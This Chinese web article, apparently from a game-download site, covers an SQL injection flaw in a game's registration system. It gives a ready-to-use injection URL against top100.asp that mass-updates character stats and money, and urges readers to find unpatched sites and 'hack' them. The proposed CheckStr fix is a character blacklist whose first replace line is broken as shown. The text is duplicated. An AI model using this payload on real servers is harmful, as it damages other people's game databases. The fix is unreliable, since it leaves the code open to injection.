SQL注入法BUG+解决办法
减小字体
增大字体SQL注入:命令如下不信可以去试试,找个唯我独尊的注册系统没修改过的就能黑
http://xxx.xxxx.xxx/top100.asp?sx=energy;update character set strength=1,dexterity=1,energy=1,vitality=1,money=-1414141414,pktime=5000,clevel=9999,pkcount=100,pklevel=100 where strength>1;--
解决方法 在 conn.asp 中加入
function CheckStr(str)
str=replace(str,"","")
str=replace(str,"=","")
str=replace(str,";","")
str=replace(str,">","")
str=replace(str,"<","")
str=replace(str,"%","")
CheckStr=str
end function
商业完整版游戏发布站程序免费下载:www.98youx.com
http://xxx.xxxx.xxx/top100.asp?sx=energy;update character set strength=1,dexterity=1,energy=1,vitality=1,money=-1414141414,pktime=5000,clevel=9999,pkcount=100,pklevel=100 where strength>1;--
解决方法 在 conn.asp 中加入
function CheckStr(str)
str=replace(str,"","")
str=replace(str,"=","")
str=replace(str,";","")
str=replace(str,">","")
str=replace(str,"<","")
str=replace(str,"%","")
CheckStr=str
end function
商业完整版游戏发布站程序免费下载:www.98youx.com
Tags:
作者:佚名
- 好的评价 如果您觉得此文章好,就请您
0%(0) 
- 差的评价 如果您觉得此文章差,就请您
0%(0) 
中查找“SQL注入法BUG+解决办法”更多相关内容
中查找“SQL注入法BUG+解决办法”更多相关内容评论内容只代表网友观点,与本站立场无关!
评论摘要(共 0 条,得分 0 分,平均 0 分)
查看完整评论
